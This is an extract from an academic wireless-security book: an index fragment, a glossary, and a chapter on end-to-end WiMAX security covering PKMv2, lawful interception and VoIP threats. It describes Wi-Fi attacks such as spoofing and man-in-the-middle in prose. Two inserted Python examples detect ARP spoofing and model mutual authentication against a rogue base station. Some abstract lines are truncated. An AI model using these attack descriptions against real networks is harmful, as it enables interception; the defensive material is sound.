trust packet acknowledgment (TPA) 648
trust packet precision (TPP) 648
tunneled TLS (TTLS) 375

U

ubiquitous and robust access control (URSA) 488
UC security model 211
UMTS integrated circuit card (UICC) 327
UMTS subscribers identity module (USIM) 300
UMTS terrestrial radio access network (UTRAN) 320
universal integrated circuit card (UICC) 381
Universal mobile telecommunications system (UMTS) 339, 763
universal mobile telecommunications system (UMTS) 146, 299, 759, 760
universal mobile telecommunication system (UMTS) 318
universal SIM (USIM) 380
user-oriented design 280
user datagram protocol (UDP) 309
user equipment (UE) 340, 382
users 281
user service identity module (USIM) 321
user terminal (UT) 340
USIM application toolkit (3GPP TS 33.111, 2001) 327

V

vehicular ad hoc networks (VANET) 450, 457
vehicular area network (VAN) 396
verifiable multilateration (VM) 571
vertical handover 286
very large-scale integration (VLSI) 256, 274, 364
VHSIC hardware description language (VHDL) 265
video encryption algorithm (VEA) 242
video object plane (VOP) 242
video on demand (VoD) 176
virtual operators (VOs) 281
virtual private network (VPN) 198, 282, 300, 357, 373, 747, 768
virtual private networks (VPNs) 198, 324
virtual backbone 656
visiting location register (VLR) 347
Visiting Mobile Node (VMN) 403
visiting mobile nodes (VMNs) 396
visitor location register (VLR) 352, 763
visitors 281
voice over IP (VoIP) 176, 368

W

war driving 131
wardriving, wireless 61–77
watermarking 32
watermarking, and imperceptibility 238
watermarking, and security 238
watermarking, in wireless environment 236–255
watermarking, lightweight 246
watermarking algorithm, for wireless multimedia 245
web-of-trust model 486
Web services (WS) 384
Wi-Fi protected access (WPA) 132, 697, 699, 761, 784
Wi-Fi security protocol 766
wideband code division multiple access (W-CDMA) 275
wideband code division multiple access (WCDMA) 320
WiFi network 291
wired equivalence privacy (WEP) 780
wired equivalent privacy (WEP) 131, 240, 761
wireless access gateway (WAG) 298
wireless application layer (WAL) 284
wireless application protocol (WAP) 298, 368
wireless area network (WAN) 13
wireless environment, multimedia encryption and watermarking 236–255
wireless interface 62–77
wireless intrusion detection system (WIDS) 78
wireless intrusion tracking system (WITS) 88
wireless LAN (WLAN) 346
wireless LAN (WLAN) 210, 240, 272
wireless LANs (WLANs) 297
wireless MAC security 417
wireless metropolitan area networks (WMAN) 347
wireless metropolitan area networks (WMANs) 760

wireless multimedia, and encryption algorithms 239
wireless multimedia, and watermarking algorithms 245
Wireless network 209
wireless network 189
wireless network, and authentication 193
Wireless Networks 721
wireless networks, and security challenges 130
wireless networks, and threats in 79
wireless networks, and vulnerabilities 129–144
wireless networks, channel jamming 130
wireless networks, illicit use of 81
wireless networks, intrusion and anomaly detection in 78–94
wireless networks, passive scanning 81
wireless networks, service set identifier detection 81
wireless networks, sniffing 81
wireless networks, spoofing 82
wireless networks, traffic analysis 130
wireless networks, unauthorized access 130
wireless routing protocols 504
Wireless security 724
Wireless Sensor Network (WSN) 209
Wireless sensor networks (WSN) 628
wireless sensor networks (WSN) 617
wireless sensor networks (WSNs) 565
wireless service access, and identity management 104–114
wireless transport layer security (WTLS) 328, 368
wireless wardriving 61–77
wireless wide area network (WWAN) 347
WLAN 721
WLAN-access gateway (WLAN-AG) 298
WLAN-access point name (W-APN) 299
WLAN authentication and privacy infrastructure (WAPI) 210
worldwide interoperability for microwave access (WiMAX) 776
worm, Cabir 4
worm, Mabir 5
wormhole attack 419, 644
wormhole attacks 648

X

XML configuration access protocol (XCAP) 391
XML document management (XDM) 390

Y

Yao graph (YG) 656

Z

zone-based IDS (ZBIDS) 425

Security and Privacy Approaches for Wireless Local and Metropolitan Area Networks (LANs & MANs)

Medium Access Control (MAC): The function in IEEE networks that arbitrates use of the network capacity and determines which stations are allowed to use the medium for transmission.

MPDU: MAC protocol data unit is a fancy name for frame. The MPDU does not, however, include PLCP headers.

MSDU: MAC service data unit is the data accepted by the MAC for delivery to another MAC on the network. MSDUs are composed of higher-level data only. For example, an 802.11 management frame does not contain an MSDU.

OFDM: Orthogonal frequency division multiplexing is a technique that splits a wide frequency band into a number of narrow frequency bands and inverse multiplexes data across the subchannels. Both 802.11a and the forthcoming 802.11g standards are based on OFDM.

Open Systems Interconnection (OSI): A baroque compendium of networking standards that was never implemented because IP networks actually existed.

Request for Comments (RFC): A series of numbered documents (RFC 822, RFC 1123, etc.), developed by the Internet Engineering Task Force (IETF) that set standards and are voluntarily followed by many makers of software in the Internet community.

Wireless Application Protocol (WAP): A standard for providing cellular telephones, pagers, and other handheld devices with secure access to e-mail and text-based Web pages. Introduced in 1997 by Phone.com, Ericsson, Motorola, and Nokia, WAP provides a complete environment for wireless applications that includes a wireless counterpart of TCP/IP and a framework for telephony integration, such as call control and telephone book access. WAP features the wireless markup language (WML), which was derived from Phone.com's HDML and is a streamlined version of HTML for small-screen displays. It also uses WMLScript, a compact JavaScript-like language that runs in limited memory. WAP also supports handheld input methods, such as a keypad and voice recognition. Independent of the air interface, WAP runs over all the major wireless networks in place now and in the future. It is also device-independent, requiring only a minimum functionality in the unit to permit use with a myriad of telephones and handheld devices.




Chapter XLVII
End-to-End (E2E) Security
Approach in WiMAX:
A Security Technical Overview for
Corporate Multimedia Applications

Sasan Adibi
University of Waterloo, Canada

Gordon B. Agnew
University of Waterloo, Canada

Tom Tofigh
WiMAX Forum, USA

ABSTRACT

An overview of the technical and business aspects is given for the corporate deployment of services over worldwide interoperability for microwave access (WiMAX). WiMAX is considered to be a strong candidate for the next generation of broadband wireless access; therefore its secur
chapter provides an overview of the inherent and complementary benefits of broadband de
a long haul wireless pipe, such as WiMAX. In addition, we explore end-to-end (E2E) security structures necessary to launch secure business and consumer class services. The main focus of this chapter is to look for a best security practice to achieve E2E security in both vertical and horizontal markets. The E2E security practices will ensure complete coverage of the entire link from the client (user) to the server. This is also applicable to wireless virtual private network (VPN) applications where the tunneling mechanism between the client and the server ensures complete privacy and security for all users. The same idea for E2E security is applied to client-server-based multimedia applications, such as in Internet protocol (IP) multimedia subsystem (IMS) and voice over IP (VoIP), where secure client/server communication is required. In general, we believe that WiMAX provides the opportunity for a new class of high data rate symmetric services. Such services will require E2E security schemes to ensure risk-free high data-rate uploads and downloads of multimedia applications. WiMAX provides the capability for embedded security functions through the 802.16 security architecture standards. IEEE 802.16 is further subcategorized into 802.16d (fixed-WiMAX) and 802.16e (mobile-WiMAX). Due to the mobility and roaming capabilities in 802.16e and the fact that the medium of signal transmission is accessible to everyone, there are extra security considerations applied to 802.16e. These extra features include: privacy key management version 2 (PKMv2), PKM-extensible authentication protocol (EAP) authentication method, advanced encryption standard (AES) encryption wrapping, and so forth. The common security features of 802.16d and 802.16e are discussed in this chapter, as well as the highlights of the security comparison between other broadband access, third-generation (3G) technologies, and WiMAX.

INTRODUCTION

The E2E security structure is transparent from the user's point of view and requires dedicated overhead and processing power. In the case of Wi-Fi, the overhead is a relatively large percentage of the total bandwidth, which makes Wi-Fi infeasible for most E2E security structures. However, in worldwide interoperability for microwave access (WiMAX), the security overhead is nominal and may not be an issue.

Today's enterprise customers are forced to use dedicated physical circuits such as leased lines to realize business class E2E security. With inherent WiMAX security features, a secured virtual private network (VPN) can easily be achieved over public networks. Instead of such dedicated leased line circuits, WiMAX users could enjoy VPN connectivity with up to 10 Mbps bandwidth to access the public backbones.

Personal broadband access technologies have undergone many challenges, one of which was digital subscriber line (DSL). DSL is a high-speed connection that utilizes the same wiring system as a regular telephone line uses. The advantages of DSL include: voice/data on the same line and higher data rates than regular modems. There are, however, a few downsides to DSL, including distance dependence (between users and the service provider) of data rate, unbalanced rates for uploading and downloading of data, and having no complete physical area coverage.

All of the downsides of DSL technology appear in other personal broadband products. This is due to the physical limitations of wired technologies. WiMAX, on the other hand, is a wireless technology with very high bandwidth for voice/data applications, which does not appear to have any of the downsides of the wired technologies. WiMAX also has advantages over Wi-Fi technology in terms of longer range and larger bandwidth. This allows WiMAX to support a variety of broadband services.

Wi-Fi technology was not suited for personal broadband services due to a number of limitations, especially security. WiMAX, on the other hand, enjoys an all-IP open platform infrastructure with the benefit of its inherent security functions and features. This allows for faster and inexpensive provisioning of E2E secured services based on open standards. In addition, WiMAX can be configured for self-installed services of multimedia VPN with enhanced end-to-end user control signalling.

The security aspect of WiMAX is an important issue: this includes state-of-the-art security mechanisms, such as very strong authentication with per station keys and higher-level security mechanisms. WiMAX's security strength is normally found in add-on products, such as in wired VPNs and virtual local area networks (VLANs), which are usually built into each of the WiMAX's base stations (BSs).

This chapter will present the characteristics of WiMAX security and how it fits into both consumer and business class structures. We believe that strong E2E security can be achieved with WiMAX without compromising performance.



Why Wireless Networks Could Not Provide the Required Security

There were two main reasons why wireless was never considered as a secured high-performance backbone option for business and corporate applications. The first issue was the bandwidth limitations of wireless links and the second issue was the high security requirements of VPN and IMS applications. The 802.11-based systems have an upper limit on bandwidth of 54 Mbps for 802.11g; however, in real-world applications this rate seldom tops more than 20-25 Mbps due to the overhead in the medium access control (MAC) layer. It is also very difficult to have a minimum guaranteed bandwidth for real-time applications such as VoIP and videoconferencing.

The current Wi-Fi security standard is presented in 802.11i, which contains many fixes for the security concerns in 802.11. However, 802.11i has not been widely implemented and distributed among end-users, and WiMAX is expected to dominate the market before 802.11i can affect the market. Therefore the main security comparisons are between Wi-Fi (802.11a/g) and 802.16. The main reasons for this weakness can be categorized as follows (Gast, 2004):

Problem #1: Easy Access
Since Wi-Fi networks generate beacon frames containing the network parameters all of the time, attackers with high gain antennas can always find networks and launch attacks. With the inherent and add-on security features, WiMAX is expected to be resilient against such attacks.

Problem #2: "Rogue" Access Points
Anyone can have access to an inexpensive access point (AP), get connected to a corporate network, and bypass authorization. In WiMAX networks, an E2E security scheme can protect APs against such a scenario.

Problem #3: Unauthorized Use of Service
Nearly all APs have default configurations with wired equivalent privacy (WEP) or with a default key used in WEP by all the vendor's products. Without WEP, a network can be accessed by anyone. Even with WEP enabled, a network is not considered to be secure nowadays.

Problem #4: Performance and Service Constraints
802.11b and 802.11g both have limited transmission capacities (11 and 54 Mbps) and, due to MAC-layer overhead, the actual effective throughput is close to half of that rate. In addition, bandwidth is not guaranteed.

Problem #5: MAC Spoofing and Session Hijacking
802.11 networks do not authenticate frames and there is no protection against a forged frame source address. Here, attackers can use spoofed frames to redirect traffic and corrupt address resolution protocol (ARP) tables. Station MAC addresses could easily be observed and used in malicious transmissions. Any user with a strong transmitter can be situated in the middle of a new session and potentially steal credentials and gain access through a man-in-the-middle (MITM) attack.

Problem #6: Traffic Analysis and Eavesdropping
802.11 is totally vulnerable to passive attacks. There is no security of the header information, thus no protection against eavesdropping. Frame headers are always "in the clear" and sender-receiver pairs are vulnerable to traffic analysis.

Problem #7: Higher Level Attacks
Once an attacker gains access (either through session hijacking, MITM, spoofing attacks, or through breaking the WEP key), it is possible to use that AP to launch attacks on other systems which are within the trusted domain of the initially attacked AP.

The main reason for the failure of security in wireless networks is the fact that there are many weaknesses in the mechanisms and protocols used in the architecture.
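The ARP-table corruption named under Problem #5 leaves a trace that a defender can watch for: an IP address whose hardware binding suddenly changes, or an ARP reply whose sender address does not match the frame that carried it. The following Python detector is an added example, not code from the chapter or from any vendor. It parses a constructed capture of ARP replies (the one-line-per-reply log format, its field names and the sample addresses are all constructed for this example) and raises an alert for a header mismatch and for a binding that flips within a configurable window.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample capture: "<ts> arp-reply ip=<sender IP> mac=<sender MAC> src=<frame source MAC>"
SAMPLE_LOG = """\
100.0 arp-reply ip=10.0.0.1 mac=00:11:22:33:44:01 src=00:11:22:33:44:01
101.0 arp-reply ip=10.0.0.25 mac=00:11:22:33:44:25 src=00:11:22:33:44:25
105.0 arp-reply ip=10.0.0.1 mac=de:ad:be:ef:00:99 src=de:ad:be:ef:00:99
106.0 arp-reply ip=10.0.0.1 mac=00:11:22:33:44:01 src=de:ad:be:ef:00:99
"""

LINE_RE = re.compile(
    r"^(?P<ts>[\d.]+) arp-reply ip=(?P<ip>\S+) mac=(?P<mac>\S+) src=(?P<src>\S+)$"
)


@dataclass(frozen=True)
class ArpReply:
    ts: float
    ip: str
    mac: str      # sender hardware address carried inside the ARP payload
    src_mac: str  # source address of the frame that delivered the reply


def parse_line(line: str) -> ArpReply:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    return ArpReply(float(m["ts"]), m["ip"], m["mac"].lower(), m["src"].lower())


class ArpWatcher:
    """Tracks the IP->MAC binding announced by ARP replies and flags suspicious changes."""

    def __init__(self, rebind_window: float = 60.0) -> None:
        self.rebind_window = rebind_window
        self.bindings = {}   # ip -> (mac, time the binding was last changed)
        self.alerts: List[Tuple[str, ArpReply]] = []

    def observe(self, r: ArpReply) -> None:
        # A reply whose ARP sender MAC differs from the frame's own source MAC is a
        # classic sign of a forged frame and is reported on its own.
        if r.mac != r.src_mac:
            self.alerts.append(("header-mismatch", r))
        prev = self.bindings.get(r.ip)
        if prev is None:
            self.bindings[r.ip] = (r.mac, r.ts)
            return
        prev_mac, since = prev
        if prev_mac != r.mac:
            # A legitimate hardware swap is rare; a change inside the window is a flip-flop.
            kind = "flip-flop" if r.ts - since < self.rebind_window else "rebind"
            self.alerts.append((kind, r))
            self.bindings[r.ip] = (r.mac, r.ts)


def scan(log_text: str, rebind_window: float = 60.0) -> List[Tuple[str, str, str]]:
    """Return (alert kind, ip, offending mac) for every suspicious reply in the capture."""
    watcher = ArpWatcher(rebind_window)
    for line in log_text.splitlines():
        if line.strip():
            watcher.observe(parse_line(line))
    return [(kind, r.ip, r.mac) for kind, r in watcher.alerts]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

On the constructed capture the gateway 10.0.0.1 is first announced from one MAC, then from another a few seconds later, and the fourth reply carries a sender MAC that disagrees with its frame source; the scan reports a flip-flop, a header mismatch and a second flip-flop, in that order. Widening or narrowing `rebind_window` only changes whether a change is labelled a flip-flop or a plain rebind; it is still reported.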



WiMAX Security Layers

Transmission control protocol (TCP)/IP protocol stacks currently dominate the data traffic transmitted between transmitters and receivers attached to the backbone of the Internet. The same situation also applies to WiMAX infrastructures; therefore it is vital to study the performance and security aspects of WiMAX systems in a similarly layered fashion. In principle, communication systems are based on the seven-layer OSI model. However, most systems communicating on the Internet's backbone obey the five-layer architecture, and the WiMAX security protocol foundation is based on the lower layers (e.g., the MAC layer), which provides extra capabilities in constructing security functions.

WiMAX enjoys the inherent security features of an open system platform and the all-IP structure, with options to enhance security in different layers of the WiMAX open architecture. All of these features have contributed to the strength of WiMAX security, which potentially enables secured applications such as VoIP and content streaming. The E2E security scheme also plays a vital role in adding an extra security feature to enable secure connections for seamless roaming of wireless broadband technologies across any network supporting TCP/IP.

This layered approach to security is further discussed in sections 3.1, 3.2, and 3.3.

Physical Layer Security

IEEE 802.16 is a MAC-layer-based protocol and its security schemes are mainly situated in the security sublayer of the MAC layer, where most of the algorithms and security mechanisms initially work. Here, the physical (PHY) and MAC layers are closely related to one another. The basic security functions at the physical layer are in the form of key exchange, encryption, and decryption. These mechanisms are, however, controlled at the MAC layer. Therefore the main objective of this section is to understand the MAC layer security mechanisms.

Another aspect related to the PHY layer is the transmission power. Unlicensed WiMAX has the same inherent security capabilities as licensed WiMAX. They do differ, however, in the amount of transmission power (unlicensed WiMAX carriers having a lower maximum power), which limits the range and also the possibility for interference.

Some other security implementations at the physical layer exploit the fact that modulation is done at this layer. Some transmitters may use frequency inversion as a security deterrent (Chandra, 2002). For example, the transmitter may divide the spectrum into various frequencies and use the different frequencies in a predetermined fashion. Obviously, this requires that both the sender and the receiver share a frequency hopping pattern. This is a form of spread spectrum communication.

Spread-spectrum systems also have an inherent security mechanism, since data meant for a particular receiver cannot easily be intercepted by other receivers if they do not possess the frequency hopping order, which is controlled by the key.

Physical layer security implementations do not provide robust protection against attacks, as they are prone to attacks such as the disruption of service (denial-of-service [DoS]). Other passive and active attacks include cross-connects and adjacent channel interference.

Therefore parts of the encryption/decryption mechanisms (which are mainly controlled at the MAC layer) that deal with the physical act of hiding information from the intruders' eyes are part of the PHY layer security schemes.

MAC Layer Security

IEEE 802.16 specifications for security mainly fall within the MAC layer. Figure 1 shows the protocol layering of 802.16 and the MAC layer's security implementation. The separate security sublayer provides authentication, secure key exchange, and encryption.

Security within the MAC layer is called the security sublayer. Its goal is to provide access control and confidentiality of the data link.

When two parties establish a link, they are protected via a set of protocols that ensure confidentiality and unique access of the authorized parties. The unique handshaking between the two


Figure 1. IEEE 802.16 lower layers (Adapted from "Part 16," 2004)

entities, namely the BS and the subscriber station (SS), is done at the MAC layer through the security sublayer, which has five entities (Chandra, 2002):

• Security associations: A security association (SA) is a set of security information parameters that a BS and one or more of its client SSs share in order to support secure communications. Three types of SAs are defined (Johnston & Walker, 2004): primary, static, and dynamic (Figure 2), which define the security keys and associations established between an SS and a BS during the authorization phase.
• X.509 certificate profile: This defines a digital certificate to verify the identity of subscribers and prevents impersonation (unauthorized SS or BS).
• PKM authorization: The privacy key management (PKM) protocol is responsible for privacy, key management, and authorizing an SS to the BS. The initial draft for WiMAX mandates the use of PKMv1 (Johnston & Walker, 2004), which is a one-way authentication method. PKMv1 requires only the SS to authenticate itself to the BS, which poses a risk for a MITM attack. To overcome this issue, PKMv2 was proposed (later adopted by 802.16e), which uses a mutual (two-way) authentication protocol. Here, both the SS and the BS are required to authorize and authenticate each other.
• Privacy and key management: The privacy of the communications between the SS and the BS is achieved through the PKM protocol.
• Encryption: The data communication between each SS and BS is encrypted using the advanced encryption standard (AES), with at least 128-bit keys. According to FIPS 140-2, AES-128 is computationally secure for data up to the SECRET level for the next 10 years.

According to the initial drafts of WiMAX, the security sublayer provides enough security mechanisms to provide privacy, authentication, and encryption over the airlink. However, in order to achieve maximal security strength, true end-to-end security is required for a corporate wireless backbone, which enhances the security mechanisms specified by the initial drafts.

Security at Upper Layers

IEEE 802.16's main focus on the security issue is at the MAC layer, therefore WiMAX has the

Figure 2. Security model of the privacy sublayer (Adapted from Barbeau, 2005)



freedom to adopt strong security measures for the upper layers (network, transport, session, and application layers). Upper layer security options, such as the Internet protocol security protocol (IPSec) and transport layer security (TLS), are examples of current security schemes for the upper layers. Through this freedom of choice, the security strength of WiMAX is comparable to the most secure networks in the market.

Lawful Interception (LI) or Lawful Legal Interception (LLI) (Baker, Foster, & Sharp, 2004; Brown, 2006; Mulholland, 2006)

Since WiMAX-enabled nodes will be connected as parts of the worldwide telecommunications networks and the telecommunications infrastructure of the world, law enforcement access is required. Standards for access to IP-based networks such as WiMAX have already been developed and are available from various standards and government bodies worldwide.

What follows is a discussion that focuses on two major standards bodies, the ETSI (European Telecommunications Standards Institute) and the IETF (Internet Engineering Task Force).

ETSI Approach to Lawful Interception

The Technical Committee on Lawful Interception (TCLI) is the leading body for lawful interception standardization within ETSI. Lawful interception standards have also been developed by ETSI technical bodies: AT, TISPAN (SPAN and TIPHON™), TETRA, and by 3GPP™. European governments might expect WiMAX vendors to provide this law enforcement access. Examples of ETSI standards include the following (copied from Arend, 2007):

• ES 201 671: Lawful Interception (LI); Telecommunications Security; Handover Interface for the Lawful Interception of Telecommunications Traffic (revised version).
• ES 201 158: Lawful Interception (LI); Telecommunications Security; Requirements for Network Functions.
• TS 102 234: Lawful Interception (LI); Telecommunications Security; Service-specific details for internet access services.
• TS 102 233: Lawful Interception (LI); Telecommunications Security; Service-specific details for e-mail services.
• TS 102 232: Lawful Interception (LI); Telecommunications Security; Handover Specification for IP Delivery.
• TS 101 671: Lawful Interception (LI); Telecommunications Security; Handover interface for the lawful interception of telecommunications traffic.
• TS 101 331: Lawful Interception (LI); Telecommunications Security; Requirements of Law Enforcement Agencies.
• TR 102 053: Lawful Interception (LI); Telecommunications Security; Notes on ISDN lawful interception functionality.
• TR 101 944: Lawful Interception (LI); Telecommunications Security; Issues on IP Interception.
• TR 101 943: Lawful Interception (LI); Telecommunications Security; Concepts of Interception in a Generic Network Architecture.

IETF Decision on Lawful Interception

The IETF has yet to consider wiretap requirements as part of its standards. The reasons for this decision are:

• Inappropriate in global standards: legal and privacy requirements are too varied
• Would increase protocol complexity and decrease security
• End-to-end security makes LI unworkable
• Other standards are already available

The IETF believes that designed mechanisms which facilitate or enable wiretapping, or methods of using other facilities for such purposes, should be described openly, so as to ensure the maximum review of the mechanisms and to ensure that they adhere as closely as possible to their design constraints. This is considered by Cisco (Figure 3) for



LI in IP networks (RFC 3924) with the following requirements (Mulholland, 2006).

Carriers should be able to provide the following:

• Content of the communication
  ° Audio content of the voice call
  ° Packets to and from the subject
• Communication-identifying information (CmII)
  ° Dialed digits in voice calls
  ° Subject login information
  ° Network address data

LI should not be detectable by the intercept subject and should include the following:

• Knowledge of wire-tapping is limited to authorized personnel.
• Ability to correlate communication-identifying information with the content of the communication.
• Confidentiality, authentication, and integrity of the CmII.
• Requirements vary between different agencies, regions, and countries.

Lawful access (LA) requirements are:

• Invisible to unauthorized personnel and other interceptors.
• Undetectable to the subject.
• Any available decryption keys should be provided to the authorities.
• Only authorized information should be provided.

Security of IMS and WiMAX

The IP multimedia subsystem (IMS) uses a standardized next generation networking (NGN) architecture for wireline as well as wireless systems. This is particularly important for WiMAX backbones, as they offer the required bandwidth for such multimedia traffic. More important is the fact that WiMAX comes in several flavors, some of which may coexist in a single network: fixed, portable, nomadic, and mobile. Therefore WiMAX covers wide areas of broadband access for personal and cellular communications, in line with the IMS coverage.

IMS provides new services as well as current and future Internet related services. This includes the end-user's ability to execute all related commands and functions even when far from the home network, roaming through foreign networks. In order for IMS to achieve these goals, the architecture of IMS uses the open standard IP protocols, which are defined by the IETF and enhanced by the 3rd Generation Partnership Project (3GPP). There are three variations of how

Figure 3. Lawful intercept architecture reference model (Adapted from Mulholland, 2006)



IMS works: session initiations between two IMS users, between an IMS user and a user on the Internet, or between two users on the Internet. IMS uses similar protocols for all such initiations. Furthermore, service developers use the IP protocol stack for the interfaces, which is why IMS can truly merge the Internet with the cellular world. This merge is done by using cellular and mobile technologies, which provide ubiquitous access, and Internet connections, which provide appealing services. Accordingly, WiMAX enjoys one of the most enhanced cellular technologies, which could work in the most efficient way to deliver IMS data and applications.

In regards to the IMS security requirements, WiMAX security mechanisms are there to ensure that all communicating parties which gain access to the media are legitimate and that all parties wishing to gain access are thoroughly authenticated through the authentication and authorization protocols. This has to be done before any access is permitted. An ongoing mutual authentication mechanism ensures that no illegitimate entity can hijack a session, abduct an already authenticated link, and take over the communications at any point.

IMS is designed to work on either fixed or mobile systems. Since WiMAX offers most of the advantages of fixed networks, it is expected that IMS is going to be offered on a pure WiMAX backbone to address corporate and end-user requirements. The fact that WiMAX is based on an all-IP core structure makes it a perfect match for IMS, with its many IP-based services in use. These services include voice over IP (VoIP), push to talk over cellular (POC), multiparty games, videoconferencing, messaging, community services, presence information, and content sharing.

Security of VoIP

One of the most important applications of IMS is VoIP, which runs over standard IP. A VoIP system uses protocols such as H.323, MGCP, MEGACO, and/or the session initiation protocol (SIP) for signaling, and the real time protocol/real time control protocol (RTP/RTCP) for media transport and control. The threats for this type of scenario (client/server), as well as in IMS/WiMAX applications, include (Mylavarapu, 2005):

• Client impersonation (an unauthorized client seeks access)
• Server impersonation (an unauthorized server pretends to be authorized)
• Message tampering (additions, deletions, or delay of the message contents)
• Session tampering/hijacking (once the session between a legitimate client and server is established, an unauthorized entity takes over the session)
• Signaling requests resulting in DoS attacks

To protect against any of the aforementioned vulnerabilities, an extensive two-way authentication method is used to ensure both the client's and the server's right of access and the establishment of an IPSec security association with the IMS terminal. This prevents the mentioned vulnerabilities as well as snooping attacks and replay attacks, and protects the privacy of every individual user.

Security issues in regards to SIP could also be summarized as follows (Access security for IP-based services, 2002):

• Protection mechanism of SIP signaling between the IMS server and the subscriber
• Subscriber's self-authentication mechanism
• Subscriber's authentication mechanism to the IMS server

The reactive and proactive security measures are the encryption/decryption of SIP messages and deploying the interconnection border control function (IBCF). IBCF is used as a gateway to external networks and provides network address translation (NAT) and firewall functions (Mylavarapu, 2005), two-way authentication-authorization schemes, and secure tunneling.

To enhance the deployment of IPSec, it is recommended to deploy IPv6 (Saito, 2003), which is the next generation Internet protocol. The important factor of IPv6 is its mandate for utilizing IPSec. Using a two-way IPSec connection (two one-way IPSec patterns) is required for an end-to-end security scheme (Saito, 2003).



End-to-End Approach in WiMAX

As mentioned earlier, the E2E scheme will ensure that the entire link from the user to the server is protected. E2E security is a major issue that could be addressed either on a peer-to-peer basis or in a multilayer manner. The E2E approach discussed here will not offer a comprehensive solution to the multilayer E2E; rather, it will present a peer-to-peer approach (i.e., BS to SS).

The heart of the airlink security scheme in WiMAX is privacy key management version 2 (PKMv2), which offers a mutual authentication method to authenticate both the SS and the BS. The following attacks could be mounted if PKMv2 is not deployed:

• BS and SS impersonations: The BS and SS should be able to authenticate the other party and find the unauthorized entity. The countermeasure is the use of mutual authentication through PKMv2 (Figure 4) with suitable credentials. PKMv2 supports two authentication protocol schemes: Rivest-Shamir-Adleman (RSA) and the extensible authentication protocol (EAP). EAP is mandatory for all devices.
• Man-in-the-middle attack: This type of attack happens when one of the communicating parties is not forced to authenticate itself, the same as in the BS-SS impersonation. The use of PKMv2 will solve this problem.
• Key exchange issue: To encrypt and decrypt information between two parties, temporal keys and session keys are used. The key distribution in the initial draft uses the triple data encryption standard (3DES) for exchanging keys. A 2-key 3DES-based key wrap is currently used for temporal encryption key (TEK) exchange. TEKs should not be used more than once and there should be a mechanism to ensure that TEKs do not repeat. Otherwise the scheme suffers from replay attacks, as there are no dynamic components in the key exchange protocol, and it also suffers from man-in-the-middle attacks. To avoid this problem, various TEKs should be used, and the EAP authentication framework and the AES counter mode with cipher-block-chaining message authentication code (AES-CCM) cipher suite should be used with PKMv2.

The PKMv2 authentication/authorization method is shown in Figure 4.

WiMAX vs. 3G Technologies

In this section, 3G cellular technologies such as the global system for mobile communications (GSM), the universal mobile telecommunications system (UMTS), and code division multiple access (CDMA) are compared with Mobile-WiMAX (802.16e), as they all fall into the cellular technology category. Mobile-WiMAX is a good alternative to the current 3G technologies.

Figure 4. The 2-way authentication and authorization of PKMv2 (Adapted from Adibi, Bin, Ho, Agnew, & Erfani, 2006)
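The impersonation and man-in-the-middle items in the End-to-End Approach section above both come down to one property: in a one-way exchange the SS never obtains proof of who answered it, while in a mutual exchange each side's proof is bound to a nonce the other side chose. The following Python model is an added example, not the chapter's or the 802.16 standard's code, and it makes that difference observable. Assumptions: an HMAC-SHA256 proof over a shared credential stands in for the RSA signature or EAP method a real SS or BS would use, a `Directory` object stands in for the X.509 certificate chain that lets a party check the other side's credential, and the party names, keys and nonces are constructed.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Tuple


def prf(key: bytes, *parts: bytes) -> bytes:
    """HMAC-SHA256 over the transcript: a constructed stand-in for an RSA signature or EAP proof."""
    return hmac.new(key, b"|".join(parts), hashlib.sha256).digest()


class Party:
    """An SS or BS holding a long-term credential (constructed: a raw key rather than an X.509 cert)."""

    def __init__(self, name: str, key: bytes) -> None:
        self.name = name
        self.key = key

    def prove(self, transcript: List[bytes]) -> bytes:
        return prf(self.key, *transcript)


class Directory:
    """Trust anchor standing in for the certificate chain: maps a claimed identity to its credential."""

    def __init__(self) -> None:
        self.keys: Dict[str, bytes] = {}

    def register(self, party: Party) -> None:
        self.keys[party.name] = party.key

    def verify(self, name: str, transcript: List[bytes], proof: bytes) -> bool:
        key = self.keys.get(name)
        return key is not None and hmac.compare_digest(prf(key, *transcript), proof)


def one_way_auth(ss: Party, bs: Party, directory: Directory) -> Tuple[bool, bool]:
    """PKMv1-style exchange: only the SS proves itself. Returns (bs_accepts_ss, ss_accepts_bs)."""
    n_ss = os.urandom(16)
    transcript = [ss.name.encode(), n_ss]
    bs_accepts = directory.verify(ss.name, transcript, ss.prove(transcript))
    # The BS answers with key material, but nothing in that answer is bound to the BS's
    # credential: all the SS learns is the name the answering party claims.
    ss_accepts = bs.name in directory.keys
    return bs_accepts, ss_accepts


def mutual_auth(ss: Party, bs: Party, directory: Directory) -> Tuple[bool, bool]:
    """PKMv2-style exchange: both sides contribute a nonce and both prove their credential over it."""
    n_ss, n_bs = os.urandom(16), os.urandom(16)
    transcript = [ss.name.encode(), bs.name.encode(), n_ss, n_bs]
    # The BS proves first; its proof covers n_ss, so a proof recorded in an earlier run is useless.
    ss_accepts = directory.verify(bs.name, transcript, bs.prove(transcript))
    if not ss_accepts:
        return False, False          # the SS aborts before revealing its own proof
    bs_accepts = directory.verify(ss.name, transcript, ss.prove(transcript))
    return bs_accepts, ss_accepts


def demo() -> Dict[str, Tuple[bool, bool]]:
    """Run both exchanges against a genuine BS and against an impostor claiming the BS's name."""
    directory = Directory()
    ss = Party("SS-1", b"ss-credential")           # constructed credentials
    bs = Party("BS-1", b"bs-credential")
    directory.register(ss)
    directory.register(bs)
    rogue_bs = Party("BS-1", b"not-the-real-key")   # claims BS-1's identity without its credential
    return {
        "one_way/genuine": one_way_auth(ss, bs, directory),
        "one_way/rogue_bs": one_way_auth(ss, rogue_bs, directory),
        "mutual/genuine": mutual_auth(ss, bs, directory),
        "mutual/rogue_bs": mutual_auth(ss, rogue_bs, directory),
    }


if __name__ == "__main__":
    for case, (bs_ok, ss_ok) in demo().items():
        print(f"{case:18s} BS accepts SS={bs_ok}  SS accepts BS={ss_ok}")
```

Under the one-way exchange the SS accepts the rogue BS exactly as readily as the genuine one, which is the opening for the MITM described above; under the mutual exchange the rogue's proof fails verification and the SS aborts without ever sending its own proof. The same check run with a rogue SS against a genuine BS shows the BS rejecting while the SS, having verified the BS, accepts.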


End-to-End (E2E) Security Approach in WiMAX
